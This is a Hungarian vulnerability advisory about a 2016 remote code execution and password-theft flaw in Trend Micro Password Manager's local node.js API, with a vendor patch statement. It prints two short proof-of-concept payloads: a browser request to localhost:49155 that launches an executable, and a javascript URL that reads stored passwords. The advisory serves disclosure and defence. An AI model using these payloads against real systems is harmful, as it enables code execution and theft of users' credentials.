Trend Micro Antivirus sérülékenysége


2016. január 12. 07:41

CH azonosító

CH-12926

Angol cím

Trend Micro Antivirus vulnerability

Felfedezés dátuma

2016.01.10.

Súlyosság

Magas

Érintett rendszerek

Anti-Virus
Trend Micro

Érintett verziók

Trend Micro Antivirus

Összefoglaló

A Trend Micro Antivirus sérülékenysége vált ismerté, melyet kihasználva a támadó tetszőleges kódot futtathat.

Leírás

A sérülékenységet az alapértelemezett jelszókezelő komponens hibája okozza, mely JavaScriptben íródott node.js-el, és HTTP RPC portokat nyit meg az API kérések kezeléséhez. Az openUrlInDefaultBrowser() függvény segítségével egy támadó tetszőleges kódot futtathat egy weboldalon keresztül, mint ahogy az alábbi példán is látható:

x = new XMLHttpRequest()
x.open("GET", "https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe true);
try { x.send(); } catch (e) {};

 

Egy második hiba miatt a pedig támadónak lehetősége nyílik megszerezni a jelszókezelőben tárolt jelszavakat az alábbi híváson keresztül:

https://localhost:49155/api/showSB?url=javascript:topWindow.process.mainModule.exports.Tower.handle.getUserData(function(n){alert(JSON.parse(n).data.passcard[0].Domain)})'

 

Továbbá a Trend Micro terméke önaláírt tanúsítványt helyez el a számítógép tanúsítványtárában.

Update 2016.01.13:

A Trend Micro tájékozatatta központunkat, hogy: “a hírekben szereplő, kritikus sérülékenységet kijavítottuk a Trend Micro Password Manager összes felhasználója számára. Szabványos tényfeltáró vizsgálatunk során meggyőződtünk róla, hogy a probléma egyedül a Trend Micro Password Manager lakossági piacra szánt változatát érintette, az üzleti és nagyvállalati termékekben nem jelentkezett. “
“2016. január 11-én kötelező érvényű frissítést bocsátottunk ki a Trend Micro ActiveUpdate szolgáltatásán keresztül, amely kijavítja a sérülékenységet: ezt minden felhasználónak telepítenie kell. Fontos tudni, hogy a Trend Micro Password Manager esetében az  ActiveUpdate frissítéseket nem lehet kikapcsolni, ami azt jelenti, hogy a Trend Micro Password Manager minden jelenlegi felhasználója automatikusan megkapja az ActiveUpdate frissítéseket. A jelentett, kritikus sérülékenység gyakorlatilag a Trend Micro Password Manager régi, ma már nem elérhető verzióját érinti.”

Tájékoztattak továbbá hogy nincs tudomásuk róla, hogy ez idő alatt bárkit a sérülékenységet kihasználó támadás ért volna.

Megoldás

Frissítsen a legújabb verzióra

Támadás típusa

execute arbitrary code

Hatás

Loss of confidentiality (Bizalmasság elvesztése)
Loss of integrity (Sértetlenség elvesztése)

Szükséges hozzáférés

Remote/Network (Távoli/hálózat)

Hivatkozások

Egyéb referencia: code.google.com
Egyéb referencia: www.zdnet.com

Legfrissebb sérülékenységek
WinZip Mark-of-the-Web kezelési sérülékenysége – WinZip Mark-of-the-Web kezelési sérülékenysége
CVE-2024-10924 – Really Simple Security WordPress plugin authentication bypass sérülékenysége
CVE-2024-1212 – LoadMaster szoftver RCE (remote-code-execution) sérülékenysége
CVE-2024-38813 – VMware vCenter Server privilege escalation sérülékenysége
CVE-2024-38812 – VMware vCenter Server heap-based overflow sérülékenysége
CVE-2024-10224 – Linux ScanDeps sérülékenysége
CVE-2024-11003 – Linux needrestart sérülékenysége
CVE-2024-48992 – Linux needrestart sérülékenysége
CVE-2024-48991 – Linux needrestart sérülékenysége
CVE-2024-48990 – Linux needrestart sérülékenysége
Tovább a sérülékenységekhez »